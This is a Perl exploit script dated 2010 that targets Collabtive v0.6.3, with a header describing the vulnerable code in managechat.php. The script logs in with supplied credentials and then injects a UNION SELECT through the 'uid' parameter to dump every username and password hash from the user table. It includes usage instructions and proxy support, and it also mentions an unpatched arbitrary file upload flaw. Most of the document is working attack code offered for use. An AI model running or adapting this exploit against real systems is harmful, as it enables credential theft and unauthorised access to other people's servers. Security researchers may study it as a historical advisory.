#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use HTTP::Cookies; use Getopt::Long; # \#'#/ # (-.-) # ------------------oOO---(_)---OOo----------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2o1o | # -------------------------------------------------- # | Collabtive v0.6.3 Multiple Vulnerabilities | # -------------------------------------------------- # [!] Discovered by.: DNX # [!] Homepage......: http://starbugs.host.sk # [!] Vendor........: http://collabtive.o-dyn.de # [!] Detected......: 04.06.2010 # [!] Reported......: 05.06.2010 # [!] Response......: xx.xx.2010 # # [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware. # Das Projekt startete im November 2007. Es ist eine # Open-Source-Software und stellt eine Alternative zu proprietären # Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben. # # Collabtive wird von einem professionellen Team entwickelt. # # [!] Requirements..: Account needed # # [!] Bug...........: $_GET['uid'] in managechat.php near line 64 # # 12: $userto_id = getArrayVal($_GET, "uid"); # # 64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC"); # # The password is encoded with sha1. # # [!] Bug...........: The arbitrary file upload discovered by USH is still present. # See http://www.milw0rm.com/exploits/7076 more details. # if(!$ARGV[5]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n ---------------oOO---(_)---OOo---------------"; print "\n | Collabtive v0.6.3 SQL Injection Exploit |"; print "\n | coded by DNX |"; print "\n ---------------------------------------------"; print "\n[!] Usage: perl collabtive.pl [Host] [Path] "; print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345"; print "\n[!] Options:"; print "\n -user [text] Username"; print "\n -pass [text] Password"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; } my %options = (); GetOptions(\%options, "user=s", "pass=s", "p=s"); my $ua = LWP::UserAgent->new(); my $cookie = HTTP::Cookies->new(); my $host = $ARGV[0]; my $path = $ARGV[1]; my $target = "http://".$host.$path; my $user = ""; my $pass = ""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } if($options{"user"}) { $user = $options{"user"}; } if($options{"pass"}) { $pass = $options{"pass"}; } print "[!] Exploiting...\n\n"; exploit(); print "\n[!] Done\n"; sub exploit { ############## # make login # ############## my $url = $target."manageuser.php?action=login"; my $res = $ua->post($url, [username => $user, pass => $pass]); $cookie->extract_cookies($res); $ua->cookie_jar($cookie); ############################ # get users with passwords # ############################ $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*"; $res = $ua->get($url); my $content = $res->content; my @c = split(/
/, $content); foreach (@c) { if($_ =~ /(.*?):<\/b> (.*)/) { print $1.":".$2."\n"; } } }